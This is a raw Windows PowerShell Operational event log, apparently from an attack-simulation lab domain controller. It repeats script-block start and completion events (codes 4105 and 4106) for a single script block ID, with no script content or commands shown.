06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475715
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475714
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475713
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475712
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475711
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475710
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475709
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475708
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475707
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475706
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475705
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475704
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475703
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475702
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475701
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475700
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475699
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475698
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475697
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475696
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475695
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475694
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475693
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475692
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475691
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475690
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475689
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475688
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475687
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475686
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475685
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475684
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475683
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475682
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475681
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475680
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475679
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475678
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475677
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475676
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475675
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475674
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475673
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475672
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475671
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475670
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475669
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475668
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475667
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475666
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475665
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475664
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475663
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475662
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475661
Keywords=None
